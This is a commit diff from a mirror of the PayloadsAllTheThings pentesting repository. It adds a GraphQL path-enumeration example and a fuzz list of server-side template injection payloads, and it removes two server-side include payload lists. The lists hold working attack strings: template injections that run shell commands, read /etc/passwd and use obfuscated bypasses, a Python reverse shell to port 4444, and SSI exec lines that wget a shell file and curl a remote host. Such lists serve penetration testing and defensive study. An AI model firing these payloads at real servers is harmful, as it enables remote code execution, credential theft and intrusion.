mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced 2024-12-18 18:36:10 +00:00
Fix - SSTI Payloads
This commit is contained in:
parent
0de5cb7123
commit
95fed140ec
@ -24,6 +24,7 @@
|
||||
* [GraphQLmap - Scripting engine to interact with a graphql endpoint for pentesting purposes](https://github.com/swisskyrepo/GraphQLmap)
|
||||
* [GraphQL-voyager - Represent any GraphQL API as an interactive graph](https://apis.guru/graphql-voyager/)
|
||||
* [GraphQL Security Toolkit - GraphQL Security Research Material](https://github.com/doyensec/graph-ql/)
|
||||
* [Graphql-path-enum - Lists the different ways of reaching a given type in a GraphQL schema](https://gitlab.com/dee-see/graphql-path-enum)
|
||||
* [GraphQL IDE - An extensive IDE for exploring GraphQL API's](https://github.com/andev-software/graphql-ide)
|
||||
* [InQL - A Burp Extension for GraphQL Security Testing](https://github.com/doyensec/inql)
|
||||
* [Insomnia - Cross-platform HTTP and GraphQL Client](https://insomnia.rest/)
|
||||
@ -155,6 +156,28 @@ query IntrospectionQuery {
|
||||
}
|
||||
```
|
||||
|
||||
### List path
|
||||
|
||||
```php
|
||||
$ git clone https://gitlab.com/dee-see/graphql-path-enum
|
||||
$ graphql-path-enum -i ./test_data/h1_introspection.json -t Skill
|
||||
Found 27 ways to reach the "Skill" node from the "Query" node:
|
||||
- Query (assignable_teams) -> Team (audit_log_items) -> AuditLogItem (source_user) -> User (pentester_profile) -> PentesterProfile (skills) -> Skill
|
||||
- Query (checklist_check) -> ChecklistCheck (checklist) -> Checklist (team) -> Team (audit_log_items) -> AuditLogItem (source_user) -> User (pentester_profile) -> PentesterProfile (skills) -> Skill
|
||||
- Query (checklist_check_response) -> ChecklistCheckResponse (checklist_check) -> ChecklistCheck (checklist) -> Checklist (team) -> Team (audit_log_items) -> AuditLogItem (source_user) -> User (pentester_profile) -> PentesterProfile (skills) -> Skill
|
||||
- Query (checklist_checks) -> ChecklistCheck (checklist) -> Checklist (team) -> Team (audit_log_items) -> AuditLogItem (source_user) -> User (pentester_profile) -> PentesterProfile (skills) -> Skill
|
||||
- Query (clusters) -> Cluster (weaknesses) -> Weakness (critical_reports) -> TeamMemberGroupConnection (edges) -> TeamMemberGroupEdge (node) -> TeamMemberGroup (team_members) -> TeamMember (team) -> Team (audit_log_items) -> AuditLogItem (source_user) -> User (pentester_profile) -> PentesterProfile (skills) -> Skill
|
||||
- Query (embedded_submission_form) -> EmbeddedSubmissionForm (team) -> Team (audit_log_items) -> AuditLogItem (source_user) -> User (pentester_profile) -> PentesterProfile (skills) -> Skill
|
||||
- Query (external_program) -> ExternalProgram (team) -> Team (audit_log_items) -> AuditLogItem (source_user) -> User (pentester_profile) -> PentesterProfile (skills) -> Skill
|
||||
- Query (external_programs) -> ExternalProgram (team) -> Team (audit_log_items) -> AuditLogItem (source_user) -> User (pentester_profile) -> PentesterProfile (skills) -> Skill
|
||||
- Query (job_listing) -> JobListing (team) -> Team (audit_log_items) -> AuditLogItem (source_user) -> User (pentester_profile) -> PentesterProfile (skills) -> Skill
|
||||
- Query (job_listings) -> JobListing (team) -> Team (audit_log_items) -> AuditLogItem (source_user) -> User (pentester_profile) -> PentesterProfile (skills) -> Skill
|
||||
- Query (me) -> User (pentester_profile) -> PentesterProfile (skills) -> Skill
|
||||
- Query (pentest) -> Pentest (lead_pentester) -> Pentester (user) -> User (pentester_profile) -> PentesterProfile (skills) -> Skill
|
||||
- Query (pentests) -> Pentest (lead_pentester) -> Pentester (user) -> User (pentester_profile) -> PentesterProfile (skills) -> Skill
|
||||
- Query (query) -> Query (assignable_teams) -> Team (audit_log_items) -> AuditLogItem (source_user) -> User (pentester_profile) -> PentesterProfile (skills) -> Skill
|
||||
- Query (query) -> Query (skills) -> Skill
|
||||
```
|
||||
|
||||
### Extract data
|
||||
|
||||
|
@ -1,75 +0,0 @@
|
||||
<pre><!--#exec cmd="ls" --></pre>
|
||||
<pre><!--#echo var="DATE_LOCAL" --> </pre>
|
||||
<pre><!--#exec cmd="whoami"--></pre>
|
||||
<pre><!--#exec cmd="dir" --></pre>
|
||||
<!--#exec cmd="ls" -->
|
||||
<!--#exec cmd="wget http://website.com/dir/shell.txt" -->
|
||||
<!--#exec cmd="/bin/ls /" -->
|
||||
<!--#exec cmd="dir" -->
|
||||
<!--#exec cmd="cd C:\WINDOWS\System32">
|
||||
<!--#config errmsg="File not found, informs users and password"-->
|
||||
<!--#echo var="DOCUMENT_NAME" -->
|
||||
<!--#echo var="DOCUMENT_URI" -->
|
||||
<!--#config timefmt="A %B %d %Y %r"-->
|
||||
<!--#fsize file="ssi.shtml" -->
|
||||
<!--#include file=?UUUUUUUU...UU?-->
|
||||
<!--#echo var="DATE_LOCAL" -->
|
||||
<!--#exec cmd="whoami"-->
|
||||
<!--#printenv -->
|
||||
<!--#flastmod virtual="echo.html" -->
|
||||
<!--#echo var="auth_type" -->
|
||||
<!--#echo var="http_referer" -->
|
||||
<!--#echo var="content_length" -->
|
||||
<!--#echo var="content_type" -->
|
||||
<!--#echo var="http_accept_encoding" -->
|
||||
<!--#echo var="forwarded" -->
|
||||
<!--#echo var="document_uri" -->
|
||||
<!--#echo var="date_gmt" -->
|
||||
<!--#echo var="date_local" -->
|
||||
<!--#echo var="document_name" -->
|
||||
<!--#echo var="document_root" -->
|
||||
<!--#echo var="from" -->
|
||||
<!--#echo var="gateway_interface" -->
|
||||
<!--#echo var="http_accept" -->
|
||||
<!--#echo var="http_accept_charset" -->
|
||||
<!--#echo var="http_accept_language" -->
|
||||
<!--#echo var="http_connection" -->
|
||||
<!--#echo var="http_cookie" -->
|
||||
<!--#echo var="http_form" -->
|
||||
<!--#echo var="http_host" -->
|
||||
<!--#echo var="user_name" -->
|
||||
<!--#echo var="unique_id" -->
|
||||
<!--#echo var="tz" -->
|
||||
<!--#echo var="total_hits" -->
|
||||
<!--#echo var="server_software" -->
|
||||
<!--#echo var="server_protocol" -->
|
||||
<!--#echo var="server_port" -->
|
||||
<!--#echo var="server_name -->
|
||||
<!--#echo var="server_addr" -->
|
||||
<!--#echo var="server_admin" -->
|
||||
<!--#echo var="script_url" -->
|
||||
<!--#echo var="script_uri" -->
|
||||
<!--#echo var="script_name" -->
|
||||
<!--#echo var="script_filename" -->
|
||||
<!--#echo var="netsite_root" -->
|
||||
<!--#echo var="site_htmlroot" -->
|
||||
<!--#echo var="path_translated" -->
|
||||
<!--#echo var="path_info_translated" -->
|
||||
<!--#echo var="request_uri" -->
|
||||
<!--#echo var="request_method" -->
|
||||
<!--#echo var="remote_user" -->
|
||||
<!--#echo var="remote_addr" -->
|
||||
<!--#echo var="http_client_ip" -->
|
||||
<!--#echo var="remote_port" -->
|
||||
<!--#echo var="remote_ident" -->
|
||||
<!--#echo var="remote_host" -->
|
||||
<!--#echo var="query_string_unescaped" -->
|
||||
<!--#echo var="query_string" -->
|
||||
<!--#echo var="path_translated" -->
|
||||
<!--#echo var="path_info" -->
|
||||
<!--#echo var="path" -->
|
||||
<!--#echo var="page_count" -->
|
||||
<!--#echo var="last_modified" -->
|
||||
<!--#echo var="http_user_agent" -->
|
||||
<!--#echo var="http_ua_os" -->
|
||||
<!--#echo var="http_ua_cpu" -->
|
@ -1,18 +0,0 @@
|
||||
</nowiki>
|
||||
<!--#echo var="DOCUMENT_NAME" -->
|
||||
<!--#echo var="DOCUMENT_URI" -->
|
||||
<!--#config timefmt="A %B %d %Y %r"-->
|
||||
<!--#echo var="DATE_LOCAL" -->
|
||||
<!--#include virtual="http://xerosecurity.com/.testing/rfi_vuln.php" -->
|
||||
<!--#include virtual="https://crowdshield.com/.testing/rfi_vuln.php" -->
|
||||
<!--#include virtual="/" -->
|
||||
<!--#exec cmd="ls" -->
|
||||
<!--#exec cmd="whoami" -->
|
||||
<!--#exec cmd="uname" -->
|
||||
<!--#exec cmd="dir" -->
|
||||
<!--#exec cmd="cat /etc/passwd" -->
|
||||
<!--#exec cmd="ipconfig" -->
|
||||
<!--#exec cmd="curl http://xerosecurity.com/.testing/rfi_vuln.php" -->
|
||||
<!--#exec cmd="perl -e 'print "X"*5000'" -->
|
||||
<!--#exec cmd="sleep 5" -->
|
||||
<!--#exec cmd="sleep 10" -->
|
49
Server Side Template Injection/Intruder/ssti.fuzz
Normal file
49
Server Side Template Injection/Intruder/ssti.fuzz
Normal file
@ -0,0 +1,49 @@
|
||||
|
||||
{{4*4}}[[5*5]]
|
||||
{{7*7}}
|
||||
{{7*'7'}}
|
||||
<%= 7 * 7 %>
|
||||
${3*3}
|
||||
${{7*7}}
|
||||
@(1+2)
|
||||
#{3*3}
|
||||
#{ 7 * 7 }
|
||||
{{dump(app)}}
|
||||
{{app.request.server.all|join(',')}}
|
||||
{{config.items()}}
|
||||
{{ [].class.base.subclasses() }}
|
||||
{{''.class.mro()[1].subclasses()}}
|
||||
{{ ''.__class__.__mro__[2].__subclasses__() }}
|
||||
{% for key, value in config.iteritems() %}<dt>{{ key|e }}</dt><dd>{{ value|e }}</dd>{% endfor %}
|
||||
{{'a'.toUpperCase()}}
|
||||
{{ request }}
|
||||
{{self}}
|
||||
<%= File.open('/etc/passwd').read %>
|
||||
<#assign ex = "freemarker.template.utility.Execute"?new()>${ ex("id")}
|
||||
[#assign ex = 'freemarker.template.utility.Execute'?new()]${ ex('id')}
|
||||
${"freemarker.template.utility.Execute"?new()("id")}
|
||||
{{app.request.query.filter(0,0,1024,{'options':'system'})}}
|
||||
{{ ''.__class__.__mro__[2].__subclasses__()[40]('/etc/passwd').read() }}
|
||||
{{ config.items()[4][1].__class__.__mro__[2].__subclasses__()[40]("/etc/passwd").read() }}
|
||||
{{''.__class__.mro()[1].__subclasses__()[396]('cat flag.txt',shell=True,stdout=-1).communicate()[0].strip()}}
|
||||
{{config.__class__.__init__.__globals__['os'].popen('ls').read()}}
|
||||
{% for x in ().__class__.__base__.__subclasses__() %}{% if "warning" in x.__name__ %}{{x()._module.__builtins__['__import__']('os').popen(request.args.input).read()}}{%endif%}{%endfor%}
|
||||
{$smarty.version}
|
||||
{php}echo `id`;{/php}
|
||||
{{['id']|filter('system')}}
|
||||
{{['cat\x20/etc/passwd']|filter('system')}}
|
||||
{{['cat$IFS/etc/passwd']|filter('system')}}
|
||||
{{request|attr([request.args.usc*2,request.args.class,request.args.usc*2]|join)}}
|
||||
{{request|attr(["_"*2,"class","_"*2]|join)}}
|
||||
{{request|attr(["__","class","__"]|join)}}
|
||||
{{request|attr("__class__")}}
|
||||
{{request.__class__}}
|
||||
{{request|attr('application')|attr('\x5f\x5fglobals\x5f\x5f')|attr('\x5f\x5fgetitem\x5f\x5f')('\x5f\x5fbuiltins\x5f\x5f')|attr('\x5f\x5fgetitem\x5f\x5f')('\x5f\x5fimport\x5f\x5f')('os')|attr('popen')('id')|attr('read')()}}
|
||||
{{'a'.getClass().forName('javax.script.ScriptEngineManager').newInstance().getEngineByName('JavaScript').eval(\"new java.lang.String('xxx')\")}}
|
||||
{{'a'.getClass().forName('javax.script.ScriptEngineManager').newInstance().getEngineByName('JavaScript').eval(\"var x=new java.lang.ProcessBuilder; x.command(\\\"whoami\\\"); x.start()\")}}
|
||||
{{'a'.getClass().forName('javax.script.ScriptEngineManager').newInstance().getEngineByName('JavaScript').eval(\"var x=new java.lang.ProcessBuilder; x.command(\\\"netstat\\\"); org.apache.commons.io.IOUtils.toString(x.start().getInputStream())\")}}
|
||||
{{'a'.getClass().forName('javax.script.ScriptEngineManager').newInstance().getEngineByName('JavaScript').eval(\"var x=new java.lang.ProcessBuilder; x.command(\\\"uname\\\",\\\"-a\\\"); org.apache.commons.io.IOUtils.toString(x.start().getInputStream())\")}}
|
||||
{% for x in ().__class__.__base__.__subclasses__() %}{% if "warning" in x.__name__ %}{{x()._module.__builtins__['__import__']('os').popen("python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"ip\",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/cat\", \"flag.txt\"]);'").read().zfill(417)}}{%endif%}{% endfor %}
|
||||
${T(java.lang.System).getenv()}
|
||||
${T(java.lang.Runtime).getRuntime().exec('cat etc/passwd')}
|
||||
${T(org.apache.commons.io.IOUtils).toString(T(java.lang.Runtime).getRuntime().exec(T(java.lang.Character).toString(99).concat(T(java.lang.Character).toString(97)).concat(T(java.lang.Character).toString(116)).concat(T(java.lang.Character).toString(32)).concat(T(java.lang.Character).toString(47)).concat(T(java.lang.Character).toString(101)).concat(T(java.lang.Character).toString(116)).concat(T(java.lang.Character).toString(99)).concat(T(java.lang.Character).toString(47)).concat(T(java.lang.Character).toString(112)).concat(T(java.lang.Character).toString(97)).concat(T(java.lang.Character).toString(115)).concat(T(java.lang.Character).toString(115)).concat(T(java.lang.Character).toString(119)).concat(T(java.lang.Character).toString(100))).getInputStream())}
|
Loading…
Reference in New Issue
Block a user